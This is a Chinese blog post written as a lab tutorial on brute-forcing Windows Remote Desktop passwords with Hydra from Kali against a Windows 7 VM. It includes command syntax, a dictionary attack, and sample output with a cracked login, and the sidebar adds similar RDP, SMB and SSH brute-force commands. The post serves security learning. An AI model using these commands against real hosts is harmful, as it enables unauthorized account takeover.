第六天 01-hydra工具windows远程桌面的密码爆破

已于 2023-01-02 19:04:59 修改
阅读量7.1k 收藏 35
点赞数 8
分类专栏: 网络安全学习 文章标签: windows linux 网络
于 2023-01-02 17:48:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56414082/article/details/128522962
版权

windows远程桌面的密码爆破

概述:

RDP是Windows的远程桌面协议。所占用的端口默认为3389,这个是可以修改的。

要求:

我们要暴力破解3389号端口的前提是对方的3389号端口是开放的。

爆破工具:kali使用hydra(九头蛇)工具进行密码爆破。

hydra语法:

​ hydra IP地址 rdp -l 用户名 -P 密码字典 -V

rdp 即RDP协议

-l 小写的l 后面加单用户名,已知用户名

-L 大写的L后面加的是用户名字典,破解用户名

-p小写的p后面加的是单密码,已知密码

-P 打写的P后面加是指定密码字典,破解密码
-V 大V是用来显示爆破的详细过程

一、实验题目:

​ windows远程桌面爆破

二、实验内容:

​ 使用Hydra

三、环境准备:

(1)kali虚拟机(工具和口令字典进行远程桌面爆破)

(2)Windows 7 虚拟机(可以被远程连接的Windows)

注意kali版本太低则无法破解3389端口,rdp需要kali相应的模块支撑。

四、实验步骤:

一、已知对方主机的远程登录用户名下爆破密码:
		1. 测试kali与win7的连通性
		2. 在KALI虚拟机上面使用命令nmap查看WIN10的3389端口是否打开。

在这里插入图片描述

  1. 在KALI虚拟机上下载好的弱密码的文本文件放到目录下

  2. 使用海德拉工具Hydra(九头蛇)工具进行爆破,字典的制作可以用工具也可以自己手动输入常见弱口令。

    密码爆破命令为:

    ​ hydra IP地址 rdp -l 用户名 -P 密码字典 -V

    -l 小写的l 后面加单用户名,已知用户名

    -P 打写的P后面加是指定密码字典,破解密码

    -V 大V是用来显示爆破的详细过程

    执行成功结果:
    22 host: 10.20.151.183 login: zc password: 123456
    1 of 1 target successfully completed, 1 valid password found

    在这里插入图片描述

账号为zc,密码为123456.

二、同时爆破账户名及密码:

  1. 创建用户账户本,密码本

  2. 命令:

    hydra IP rdp -L 用户本 -P 密码本 -V

    -L 大L是账号字典
    -P 大P是指定密码字典

字典一般要把路径加上不过要是能在相对路径下补全出来就不用

a IP rdp -L 用户本 -P 密码本 -V

-L 大L是账号字典
-P 大P是指定密码字典

字典一般要把路径加上不过要是能在相对路径下补全出来就不用

在这里插入图片描述

阿凯6666
关注
  • 8
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Window版NMAP扫描工具Hydra爆破工具安装及简单指令使用
与君共勉
11-20 3794
Hydra -l a -P e:\pass.txt 10.1.1.1 rdp(远程桌面服务,3389)Hydra -l a -P e:\pass.txt 10.1.1.1 smb(共享服务,445)Nmap -O (大写) 10.1.1.1 扫描目标系统版本,也有开发端口的一些情况;Nmap -p 21,23 10.1.1.1 -sV 扫描指定端口的服务版本;Nmap -p 21,23-25,3389 10.1.1.1 指定端口信息;Nmap -A 10.1.1.1 全面扫描。
局域网远程修改windows密码
07-03
本软件支持在局域网内远程修改操作系统用户帐户的密码,只有一个文件,绿色版,相当实用!
破解远程桌面密码
02-15
破解 远程桌面 密码 破解 3389 密码
hydra强大的爆破工具,支持多种协议
05-05
hydra支持POP3,SMB,RDP、SSH,FTP,POP3,Telnet,MYSQL等协议的爆破
登录爆破神器:Hydra 保姆级教程
最新发布
Flag少侠的博客
06-19 8116
Hydra 是一个广泛使用的网络登录破解工具,支持多种协议(如 HTTP、FTP、SSH、Telnet 等),用于执行暴力破解攻击。它由 Van Hauser 和 The Hacker's Choice (THC) 团队开发,设计用于快速和高效地尝试大量用户名和密码组合,帮助安全研究人员测试系统的登录安全性。
Windowshydra(海德拉/九头蛇)暴力猜解RDP的简单渗透实践
qq_44846097的博客
03-20 456
Windowshydra(海德拉/九头蛇)暴力猜解RDP的简单渗透实践
Hydra密码爆破工具使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
12-06 2万+
Hydra也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。
RDP爆破
HeLLo_a119的博客
03-18 420
线程默认是50,如果担心影响业务可以修改为5。第五步:选择需要检查的服务。工具:超级弱口令检查工具。第一步:双击打开工具
hydra详解(仅供学习参考)
m0_50818626的博客
07-11 1363
Hydra是一款非常强大的暴力破解工具,由著名的黑客组织THC开发的一款开源暴力破解工具hydra 参数 IP 服务。2、 加载对应命令开始爆破。三、各类协议破解具体方法。
常见协议爆破—ssh、rdp、smtp、pop3、imap等
qq_43058348的博客
04-27 3190
环境 kali- - - - 任意PC 常用爆破工具 msf、hydra、medusa、patator等 rdp hydra -l username -p password rdp://ip python patator.py rdp_login host=10.10.70.4 user='admin' password = '1' #上面这个主意要先export DISPLAY=:0.0 ssh hydra -l username -p password ssh://ip medusa -u u
003--横向渗透的常见方法
weixin_44508748的博客
07-22 2958
在已经攻占部分内网主机的前提下,利用现有的资源尝试获取更多的凭据、更高的权限,进而达到控制整个网段、拥有最高权限的目的。在很多时候,内网渗透的起点往往只是一台通过各种漏洞漏洞攻陷的跳板,通过这个突破口去不断扩大在本网段内的战果,是为横向渗透。 一、系统漏洞 0day 二、流量监听 三、ARP欺骗 四、服务密码攻击 ...
thc-hydra-windows:适用于Windows的出色THC-HYDRA工具
05-10
Windows编译的THC-HYDRA工具 特征 最新的9.1版本(2020-07-29) 仅从9.1版开始针对x64进行编译,针对x86进行了编译,因此它们应可在x86和x64平台上运行 与SSH,MySQL,PostgreSQL和RDP可选模块一起编译 嵌入式...
thc-hydra-windows-master.zip
06-02
thc-hydra-windows-master.zip
密码爆破DOS运行_hydra-7.3-windows.7z
02-13
暴力猜解即是穷举法,穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;...
thc-hydra-windows-master爆破工具
05-12
爆破工具
hydra-8.2(windows).zip
06-24
先从第一个扫出来的21端口入手 首先hydra这个不是一个图形界面的软件,需要在命令行界面执行。但是连我这种英语小白都能用,大家就放心食用吧。 在hydra文件夹下按住shift点击鼠标右键,选择终端打开(win10是在...
hydra暴力破解ssh密码
记忆碎片
08-16 1万+
环境:centos7.0 hydra,是一个非常好用的暴力破解工具,而且名字也很cool。 下面是它支持的一些服务: AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-
hydra工具windows班本哪下载
09-01
要下载Hydra工具Windows版本,你可以访问以下网站:https://github.com/vanhauser-thc/thc-hydra/releases 在这个网站上,你可以找到Hydra工具的各个版本和操作系统的适配版本。找到适用于Windows操作系统的版本,然后点击下载链接。通常,你会找到一个.exe文件,这是Hydra工具的可执行文件。 下载完成后,你可以将该文件保存在你选择的位置。然后,运行该文件以安装和配置Hydra工具。在安装过程中,你可能需要提供管理员权限以完成安装。安装完成后,你就可以使用Hydra工具来执行网络渗透测试或其他任务。 需要注意的是,Hydra工具的使用需要一定的技术知识和合法授权。确保你遵守相关的法律和道德准则,并只在合法的环境中使用该工具
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿凯6666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值